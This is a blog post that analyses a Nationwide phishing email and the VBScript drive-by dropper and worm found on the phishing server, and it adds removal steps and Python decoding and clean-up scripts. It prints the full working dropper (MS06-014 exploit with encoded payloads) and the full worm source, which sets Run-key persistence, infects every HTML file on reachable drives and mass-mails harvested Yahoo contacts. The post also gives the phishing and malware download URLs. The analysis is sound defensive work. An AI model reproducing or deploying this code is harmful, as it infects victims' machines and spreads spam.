A phisherman writes…

Files involved in this (all of them land in the Windows system32 directory): systems.exe, Kernel.exe, Kernel.vbs, Systeme.dll, Systemv.dll, TSP32E.DLL, TSP32V.DLL, plus mail.log and send.log. The following email has arrived:

Nationwide Logo

Dear Customer,

It has come to our attention that your Online account informations needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website.

If you could please take 5-10 minutes out of your online experience and update your billing records so that you will not run into any future problems with our online banking service.

However, failure this will result in account suspension

http://www.nationwide.co.uk/update <<–don’t click!!! you divvy–>>

Nationwide Bank Plc
Security Advisor
Nationwide Bank PLC.


Please do not reply to this e-mail. Mail sent to this address cannot be answered.
For assistance, log in to your Nationwide Internet Bank account and choose the “Help” link on any page.

Nationwide Email ID # 1009

Lovely! I don’t even bank with Nationwide, but always happy to oblige, of course…

First off, the headers. This mail appears to originate from eta.easy-hebergement.net (eta.easy-hebergement.net [80.248.211.138]). This is webhosting in France.

One of the things that I find annoying about these phishing mails is the fact that I have yet to come across one that hasn’t got spelling errors and whatnot. Why can these jerks not even be bothered to spell correctly? Why is the population at large so illiterate that they cannot perceive these errors and be warned?

And do people not check links before clicking on them? Granted, the page at http://vaxweb.net/modules/Feedback_eeez/online/infobox/www.nationwide.co.uk/nationwide.co.uk/olb2.nationet.com/Updating/default1.aspID=381cfed80bc993c7a6e30a33cd7aec24f15.htm presumably looks realistic. Apart from the lengthy URL, with the bank's hostname buried in the path of somebody else's server, and the lack of HTTPS, I suppose. You can type any old shit for username and password, and it duly sends it back.

They have left their directories browsable, so I browse a bit, and this drive-by download is what I get. Below is the page, complete with e-mail address for complaints etc:

HTTP/1.1 200 OK
Date: Sun, 17 Jun 2007 09:02:39 GMT
Server: Servage.net Cluster/(Enhanced Apache)
Last-Modified: Fri, 25 May 2007 02:40:49 GMT
ETag: "2880005-6ea0-46564cb1"
Accept-Ranges: bytes
Content-Length: 28320
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0027)http://www.latef.net/image/ -->
<HTML dir=rtl><HEAD><TITLE>The HaCKerS Damn TeaM</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1256">
<STYLE type=text/css>BODY {
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #ffffff; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #ffffff
}
.Estilo10 {
COLOR: #ffffff; FONT-FAMILY: Haettenschweiler
}
.Estilo8 {
FONT-SIZE: 10px; COLOR: #ffffff; FONT-FAMILY: Haettenschweiler
}
</STYLE>
<!--
// please keep these lines on when you copy the source
// made by: Nicolas – http://www.javascript-page.com

var mymessage = "? ";

function rtclickcheck(keyp){
if (navigator.appName == "Netscape" && keyp.which == 3) {
alert(mymessage);
return false;
}

if (navigator.DR.Prr0bLeMwas'here.appVersion.indexOf("MSIE") != -1 && event.button == 2) {
alert(mymessage);
return false;
}
}

document.onmousedown = rtclickcheck
//-->
<META content="MSHTML 6.00.2900.2802" name=GENERATOR></HEAD>
<BODY text=#ff0000 vLink=#FF0000 aLink=#FF0000 link=#646464 bgColor=#000000
background=”silver.gif”>
<DIV dir=ltr align=center><SPAN
style="FILTER: blur(add=1,direction=270,strength=30); HEIGHT: 30px">
<DIV align=center>
<DIV dir=ltr align=center>
<SPAN
style="FILTER: blur(add=1,direction=270,strength=30)"><NOBR>
<P align=center><B><A
style="TEXT-DECORATION: none" href="mailto:[email protected]">
<FONT
color=#00ffff style="font-size: 70pt" face="Comic Sans MS"><SPAN lang=ar-sa>&nbsp;</SPAN></FONT><SPAN lang=ar-sa><FONT face="Castellar" size="7"><FONT color=#0099FF>s</FONT><FONT color=#FFFFFF>aud</FONT><FONT color=#0099FF>i</FONT></FONT><font face="Castellar" size="7" color="#FFFFFF">.</font><font face="Castellar" size="7" color="#0099FF">h</font><font face="Castellar" size="7" color="#FFFFFF">ekra</font><font face="Castellar" size="7" color="#0099FF">z</font><FONT color=#00FFFF style="font-size: 70pt" face="Comic Sans MS"><br>
&nbsp;</FONT></SPAN></A></B></P>
<P align=center><B><FONT face="Castellar" size="5"><A
style="TEXT-DECORATION: none" href="mailto:[email protected]"><SPAN lang=ar-sa><FONT color=#0099FF>s</FONT><FONT color=#FFFFFF>a</FONT></SPAN></A></FONT><A
style="TEXT-DECORATION: none" href="mailto:[email protected]"><SPAN lang=ar-sa><FONT face="Castellar" size="5" color="#FFFFFF">ud</FONT><FONT color=#0099FF face="Castellar" size="5">i</FONT><FONT color=#FFFFFF face="Castellar" size="5">.</FONT><FONT color=#0099FF face="Castellar" size="5">h</FONT><FONT color=#FFFFFF face="Castellar" size="5">ekra</FONT><FONT color=#0099FF face="Castellar" size="5">z</FONT></SPAN></A><font face="Castellar" size="5" color="#FFFFFF">@</font><font color="#0099FF" face="Castellar" size="5">h</font><font face="Castellar" size="5" color="#FFFFFF">otmai</font><font color="#0099FF" face="Castellar" size="5">l</font><font face="Castellar" size="5" color="#FFFFFF">.</font><font color="#0099FF" face="Castellar" size="5">c</font><font face="Castellar" size="5" color="#FFFFFF">o</font><font color="#0099FF" face="Castellar" size="5">m</font></B></P><B>
<P align=center><FONT color=#33cc33><FONT face="Comic Sans MS"
color=#ffffff size=5>S</FONT><FONT face="Comic Sans MS" size=5><FONT
color=#0099ff>ee</FONT> <FONT
color=#ffffff>y</FONT><FONT
color=#0099ff>ou</FONT></FONT></P></FONT></B></NOBR></SPAN>
<P align=center><SPAN
style="FILTER: blur(add=1,direction=270,strength=30)"><FONT face="Comic Sans MS"
color=#ffffff size=2>
<EMBED name=video0 pluginspage=http://www.real.com/player/
src=http://www.6rb.com/song4/kw/thuwa7y/thuwa7y-la_kha6-samra.ram width=165 height=62 true
type=audio/x-pn-realaudio-plugin loop="true" autostart="true" nojava="true"
controls="ControlPanel,StatusBar" maintainaspect="false" hidden></FONT></SPAN><SPAN
lang=ar-sa><FONT face=”Comic Sans MS” color=#00ff00 size=6>
</FONT></SPAN></P></DIV></DIV></SPAN></DIV></BODY></HTML>

<script language=vbscript>
on error resume next
fileexe1="077090144000003000000000004000000000255255000000184000000000000000000000064000000000000000000000000000000000 (.. and so forth)

filevbs1="039078097118105100032110101119032118105114117115032050048048054040049051055053046049041013010111110032101114 (..and so forth)

dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if fso.opentextfile(sys & "\Systeme.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>

This is a drive-by dropper. The object it creates is the RDS.DataSpace ActiveX control (that CLSID), and its CreateObject is used to get hold of Scripting.FileSystemObject, Shell.Application and WScript.Shell from a web page, which is the MS06-014 hole, so it only fires in an unpatched IE. The two long strings are the payloads, three decimal digits per byte, and the loop turns them back into bytes with chr(). It writes the still-encoded strings to TSP32E.DLL and TSP32V.DLL in the system directory (GetSpecialFolder(1) is system32), decodes them into Kernel.exe and Kernel.vbs, and runs each one via Shell.Application unless a marker file (Systeme.dll for the EXE, Systemv.dll for the VBS) already says "on". Two things worth noting: the EXE goes to disk through a text stream, and the loop is bounded by the length of the VBS blob, so if that is shorter than the EXE blob the binary comes out truncated.
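To get the payloads out of a captured copy of the page without letting the VBScript anywhere near a browser, here is an added example (my own code, not anything from the post or from Navid). It parses the fileexe1/filevbs1 assignments and decodes them exactly as the dropper's loop does, three digits per byte, and handles a blob that has been cut short. The sample page is constructed from the prefixes quoted above, and the regex and function names are mine; it also decodes the filehtm1 prefix quoted from Kernel.vbs further down.

```python
"""Decode the 3-digit-decimal blobs a Navid-style dropper embeds in a page.

Added example, not code from the post: the captured page is parsed
offline and the fileexe1/filevbs1 strings are turned back into bytes the
same way the dropper's loop does it (chr(mid(s,a,3)) with Step 3).
"""
import re
from typing import Dict

# Constructed sample input: the opening bytes of the two blobs exactly as
# quoted in the post, wrapped in the dropper's own framing. The real
# blobs run to tens of kilobytes.
SAMPLE_PAGE = (
    "<html>...defacement page...</html>\r\n"
    "<script language=vbscript>\r\n"
    "on error resume next\r\n"
    'fileexe1="077090144000003000000000004000000000255255000000184000000000000000000000064000000000000000000000000000000000"\r\n'
    'filevbs1="039078097118105100032110101119032118105114117115032050048048054040049051055053046049041013010111110032101114"\r\n'
    "dim sys\r\n"
    "</script>\r\n"
)

# Kernel.vbs carries the tail of the dropper the same way (filehtm1); this
# is the prefix quoted in the post and it ends on a cut-off digit group.
SAMPLE_FILEHTM1 = "10010510903211512111501301008310111603210010203206103210011109911710910111011604609911"

# One assignment per line: fileexe1="ddd...", filevbs1="ddd...", filehtm1=...
BLOB_RE = re.compile(r'^\s*(file[a-z]+1)\s*=\s*"(\d+)', re.MULTILINE)


def decode_triplets(blob: str) -> bytes:
    """Mirror the dropper: every 3 decimal digits are one byte value.
    A trailing partial group (blob cut short, or a truncated capture)
    is dropped rather than mis-decoded."""
    usable = len(blob) - len(blob) % 3
    return bytes(int(blob[i:i + 3]) for i in range(0, usable, 3))


def extract_blobs(page: str) -> Dict[str, bytes]:
    """Pull every fileXXX1="ddd..." assignment out of a captured page."""
    return {name: decode_triplets(digits) for name, digits in BLOB_RE.findall(page)}


def classify(data: bytes) -> str:
    """Cheap triage of a decoded blob by its leading bytes."""
    if data[:2] == b"MZ":
        return "pe-executable"
    if all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "script/text"
    return "unknown"


if __name__ == "__main__":
    for name, data in extract_blobs(SAMPLE_PAGE).items():
        print(name, classify(data), data[:32])
    print("filehtm1", decode_triplets(SAMPLE_FILEHTM1))
```

On the quoted prefixes this gives a standard MZ/DOS header for fileexe1 (so Kernel.exe is a real PE, whatever else it is) and the comment line 'Navid new virus 2006(1375.1) for filevbs1, which is how the Kernel.vbs dump below starts. The filehtm1 prefix from Kernel.vbs decodes to "dim sys" followed by "Set df = document.c", i.e. the remainder of this very dropper: Kernel.vbs stitches TSP32E.DLL, TSP32V.DLL and that tail back into the full drive-by script so it can append it to other HTML files.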

Below is Kernel.vbs. Navid has proper cheek calling this lame little piece of shite a virus! What it actually does: it writes "on" to Systemv.dll so the dropper will not launch it a second time, registers itself and Kernel.exe under the Run keys (HKCU for the VBS, HKLM for the EXE, both as a value called "Microsoft Windows"), then walks every fixed and network drive (DriveType 2 and 3, so shares get it too) and appends a rebuilt copy of the whole drive-by page (TSP32E.DLL, TSP32V.DLL and the filehtm1 tail) to every .htm, .html and .htt file it finds, so that opening any of them in an unpatched IE infects the machine all over again. Along the way it collects the folder names under Yahoo!\Messenger\Profiles as @yahoo.com addresses, writes them to mail.log, and mails each one a "Hello" via CDO, from the logged-in Yahoo! ID's address, pointing at his sexy girl websait. Presumably this twat has no other means of getting punters to click on it. And yahoo... always bastard yahoo... My Virtual Server doesn't have any Yahoo stuff on it, so the efficacy of this mailer is untested.

'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206103210011109911710910111011604609911 (long thing here cut down)
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL").readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL").readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm))<>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: http://girlsex.webs.io/picture.htm"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub

And what it wants next is to go online again, this time to http://h1.ripway.com/dreamhack/H/Navidhack.exe. Again, don't fucking click; you'd only be using up his bandwidth. The idea is that the binary called Navidhack.exe gets saved onto the hard drive under the name "systems.exe". Unfortunately for him, all this free webhosting with its bleeding download limits makes that impossible. What gets saved instead is the page saying the limit has been exceeded:

<snip>
This user account has exceeded their daily bandwidth limit. If this is your account, you might consider upgrading to a premium plan, or reduce the number or size
of files you’re sharing online. As soon as the total downloads from this account over a 24 hour period drops below the
accounts limit, downloads will be restored.
</snip>

Sadly, this is not a program. The saved file is HTML with no MZ header, so when it is executed Windows hands it to ntvdm.exe (the DOS emulator), which just generates errors.

Saudi-hekraz

A little googling doesn't really show up a lot. This lot of top hekras is presumably too 1337 to even have a web presence... yeah right. Have a look at this Google cache (the original page is http://asp1.umbc.edu/ute/projectvideo/forum/default.asp and at the time of writing still affected, but I dare say someone will have a go at restoring it at some point): http://66.102.9.104/search?q=cache:5GXZvPtPNPAJ:asp1.umbc.edu/ute/projectvideo/forum/default.asp+saudi.hekraz&hl=en&ct=clnk&cd=2&gl=uk. This gives a pretty good idea what these little tits are all about. They know the little SQL hack and now it's gonzo woz ere all along. It reminds me of bus shelters that have been defaced by bored little skiving yoofs with black marker pens who need rounding up and putting against the wall. Tatatatata.

Removal

As you can see from the code, this thing inserts two entries into the registry, both Run values called "Microsoft Windows": one under HKEY_CURRENT_USER pointing at system32\Kernel.vbs and one under HKEY_LOCAL_MACHINE pointing at system32\Kernel.exe. These will have to come out. First stop all the processes associated with the "virus" (Kernel.exe, systems.exe, and the wscript.exe instance running Kernel.vbs) and delete the dropped files from the system32 directory: Kernel.exe, Kernel.vbs, systems.exe, TSP32E.DLL, TSP32V.DLL, Systeme.dll, Systemv.dll, mail.log and send.log. Quick, quick, they're being recreated immediately while anything is still running. Then delete the two entries that were made:

re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"

That is not the end of it, though. Kernel.vbs has appended the whole drive-by page to every .htm, .html and .htt file on every fixed and network drive it could reach, and opening any one of them in an unpatched IE runs the dropper again. So those files need cleaning too (look for a trailing <script language=vbscript> block after the closing </HTML>), and IE wants the MS06-014 fix before any of them is opened.
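For the file clean-up, here is an added example (my own code, not from the post) that finds the block Kernel.vbs appends and truncates it off, walks a directory tree the way the worm does, and, on Windows only, removes the two Run values and the dropped files. The marker it looks for is the start of filehtm as built in the Kernel.vbs source above; the sample pages are constructed, with a shortened stand-in for the real multi-kilobyte blobs, and the file list is the one the post identifies.

```python
"""Find and strip the Kernel.vbs infection from local HTML files.

Added example, not code from the post. Kernel.vbs appends vbcrlf & filehtm
(a complete <script language=vbscript> block rebuilt from TSP32E.DLL and
TSP32V.DLL) to every .htm/.html/.htt file it can reach, so those files
re-infect the machine if opened in an unpatched IE.
"""
import os
import sys

# The fixed start of what Kernel.vbs appends (see filehtm in its source).
# No legitimate page contains this, so anything from here on is cut.
MARKER = b"<script language=vbscript>\r\non error resume next\r\nfileexe1=\""
INFECTED_EXTS = {".htm", ".html", ".htt"}

# Constructed samples: a benign page, and the same page after the worm has
# appended a shortened stand-in for its script block.
CLEAN_SAMPLE = b"<HTML><BODY>my home page</BODY></HTML>"
INFECTED_SAMPLE = (
    CLEAN_SAMPLE + b"\r\n" + MARKER + b"077090144"
    b"\"\r\nfilevbs1=\"039078097\"\r\ndim sys\r\n"
    b"s.Open (sys & \"\\Kernel.vbs\")\r\n</script>"
)

# Persistence and droppings named in the post (value name is "Microsoft Windows").
RUN_VALUES = [
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Microsoft Windows"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Microsoft Windows"),
]
DROPPED_FILES = ["Kernel.exe", "Kernel.vbs", "systems.exe", "TSP32E.DLL",
                 "TSP32V.DLL", "Systeme.dll", "Systemv.dll", "mail.log", "send.log"]


def find_dropper(data: bytes) -> int:
    """Offset at which the appended block starts, or -1 if the file is clean.
    The worm only ever appends, so search from the end, and take the CRLF
    it wrote in front of the block along with it."""
    pos = data.rfind(MARKER)
    if pos < 0:
        return -1
    if pos >= 2 and data[pos - 2:pos] == b"\r\n":
        pos -= 2
    return pos


def clean_html(data: bytes) -> bytes:
    """Strip every appended block; a file hit by more than one variant
    carries several, each after the last."""
    while True:
        pos = find_dropper(data)
        if pos < 0:
            return data
        data = data[:pos]


def disinfect_tree(root: str) -> list:
    """Walk root like the worm does and truncate infected files in place.
    Returns the paths that were cleaned."""
    cleaned = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in INFECTED_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            fixed = clean_html(data)
            if len(fixed) != len(data):
                with open(path, "wb") as fh:
                    fh.write(fixed)
                cleaned.append(path)
    return cleaned


def remove_persistence() -> list:
    """Windows only: delete the two Run values and the dropped files.
    Kill wscript.exe, Kernel.exe and systems.exe first or they come back."""
    if sys.platform != "win32":
        return []
    import winreg
    done = []
    for key_path, value in RUN_VALUES:
        hive_name, _, sub = key_path.partition("\\")
        try:
            with winreg.OpenKey(getattr(winreg, hive_name), sub, 0, winreg.KEY_SET_VALUE) as k:
                winreg.DeleteValue(k, value)
                done.append(key_path + "\\" + value)
        except OSError:
            pass
    system32 = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "system32")
    for name in DROPPED_FILES:
        try:
            os.remove(os.path.join(system32, name))
            done.append(name)
        except OSError:
            pass
    return done


if __name__ == "__main__":
    print(remove_persistence())
    print(disinfect_tree(sys.argv[1] if len(sys.argv) > 1 else "."))
```

Run it once per drive the worm could see, including any mapped shares, and only after the processes are dead and the Run values are gone; otherwise Kernel.vbs will happily re-append to the files you just cleaned on its next pass.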
